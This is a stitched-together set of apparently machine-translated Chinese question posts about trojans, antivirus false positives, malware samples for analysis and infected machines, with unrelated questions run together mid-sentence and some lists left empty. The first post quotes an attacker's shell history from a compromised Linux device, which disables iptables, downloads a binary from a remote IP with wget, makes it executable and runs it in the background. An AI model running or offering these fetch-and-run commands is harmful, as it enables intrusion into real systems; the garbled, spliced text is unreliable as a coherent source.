我正在开发一个消费产品,它应该连接到互联网,所以正如预期的那样,它连接到互联网以便我可以正确地开发它。
我离开了一两个小时,当我回到办公室时,我注意到终端上写着一些奇怪的命令。
查看名为auth.log我的 Linux 日志文件,我可以看到以下几行(还有更多):
Feb 1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162 user=root
Feb 1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Feb 1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]
40.127.205.162事实证明,该 IP 地址归 Microsoft 所有。
以下是我不在时使用的一堆命令:
355 service iptables stop
356 cd /tmp
357 wget http://222.186.30.209:65534/yjz1
358 chmod 0755 /tmp/yjz1
359 nohup /tmp/yjz1 > /dev/null 2>&1 &
360 …我最近看到了很多这些。你点击链接,即刻木马。无需下载或任何东西。
这怎么可能?有没有办法在访问之前扫描链接以确保我不会被感染?
Microsoft Security Essentials 将 Google Chrome 检测为密码窃取程序:
PWS:Win32/Zbot
类别:密码窃取者
描述:这个程序很危险,会捕获用户密码。
推荐操作:立即删除此软件。
Security Essentials 检测到可能会危害您的隐私或损坏您的计算机的程序。您仍然可以访问这些程序使用的文件而不删除它们(不推荐)。要访问这些文件,请选择允许操作并单击应用操作。如果此选项不可用,请以管理员身份登录或向安全管理员寻求帮助。
文件:%LocalAppData%\Google\Chrome\Temp\source\Chrome-bin\chrome.exe
我不知道这是我试图从我的另一台机器、chrome 应用程序本身同步的特定扩展,还是只是误报。我在 Chrome 与之同步的另一台机器上运行了完整扫描,但没有检测到任何内容。
我应该担心吗?我能做些什么来摆脱它?
google-chrome ms-security-essentials trojan password-protection
我刚刚将几张 LP 数字化,需要一些封面艺术。我的扫描仪不够大,无法扫描相册,所以我从网上搜索并下载了图片。
当我这样做时,Avast 报告其中一个包含“Win32:Hupigon-ONX”木马并立即将其隔离。不想冒险,我下载了一个报告为干净的不同副本。
现在这只是来自 Avast 的误报还是 jpg 中真的有木马?
如果有,它将如何执行?
我必须承认,木马和病毒这方面一直让我感到困惑。作为软件开发人员,我总是检查数组的长度等。所以我不明白为什么会发生缓冲区溢出之类的事情。我知道人们确实会偷工减料并犯错误,如果软件足够复杂,这些错误可能会漏掉。
我最近为我创建了一个程序,并没有真正考虑它的可执行性构成威胁,因为我非常信任源,但并不完全信任。
然后我想到了一个事实,即键盘记录器或任何类型的间谍软件或恶意软件都可能与它绑定。这让我想知道我每天从地方或人(种子)下载的所有其他东西,我不会三思而后行。
有人如何知道是否有某种键盘记录器绑定到您正在运行的软件或其他绑定的东西?
有什么好的方法可以找出并阻止这些事情?
哪里可以下载病毒、作品、木马等进行分析?是的,我实际上是在寻找恶意软件,而不是将其拒之门外并躲在防病毒软件和防火墙后面。我计划在一个项目的实验室中对其进行分析,但不知道从哪里开始寻找。
在我上大学后的今天早上,一种病毒感染了我的电脑,而我没有任何用户交互。当我回到家时,我的计算机完全被冻结并感染了许多木马。自从返回以来,我没有输入任何重要的内容,因此无法记录密钥。但是,我想确切地知道我的计算机从感染之时起何时崩溃,以了解黑客可能远程执行的操作。
在启用防火墙的完全更新的 Windows 7 安装中,我的电脑被诊断出的病毒是“fakespypro”。我的电脑连接到内部宿舍网络,所以可能必须用它做一些事情。
任何有关我如何回溯这种病毒感染或发现哪些数据可能被盗的方法的进一步信息将不胜感激。
我的机器受到了木马的攻击,该木马在 netsvcs svchost 进程中表现为服务。可以使用进程资源管理器将此进程标识为“svchost -k netsvcs”。
我的机器被感染的症状是:
以下是我为确定罪魁祸首究竟是哪个服务所做的工作。
可以在以下注册表位置获取 Windows 将在 netsvcs svchost 容器中启动时运行的服务列表:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\netsvcs。MULTI_REG_SZ 值中的每个字符串都是位于以下位置的服务的名称:HKLM\SYSTEM\CurrentControlSet\Services。
对于 netsvcs 中列出的每个服务,我在 SvcHost 中创建了一个不同的条目,然后更新了服务的 ImagePath 以指示该服务现在应该在哪个 svchost 下运行。
例如 - 要在它自己的 svchost 下运行服务 AppMgmt,我们将执行以下操作:
我刚刚从他们那里下载了 Fling(一个自动 ftp 上传器),长期以来一直在寻找一个好的应用程序来做到这一点。终于偶然发现了一个看起来不错的软件,这似乎很好。
这是他们的网站:http : //www.nchsoftware.com/
更具体地说:http : //www.nchsoftware.com/fling/index.html
所以看起来不错,所以我用谷歌搜索它,发现有几个人的防病毒软件通知他们 Fling 是一个木马程序!从那以后,我了解到这是一个误报,并且已得到修复。无论如何,我现在对此感到有点偏执。
被认定为木马:http : //forum.kaspersky.com/index.php? s= 6508a10c18a04edc4d3a34d248eb8967& showtopic= 95546
你怎么认为?你以前用过 NCH 吗?他们还好吗?合法吗?
今天早上我正在更新 wget,赛门铁克通知我在 locale.exe 和 tzset.exe 中检测到木马
这是否意味着我的 cygwin 安装被感染了?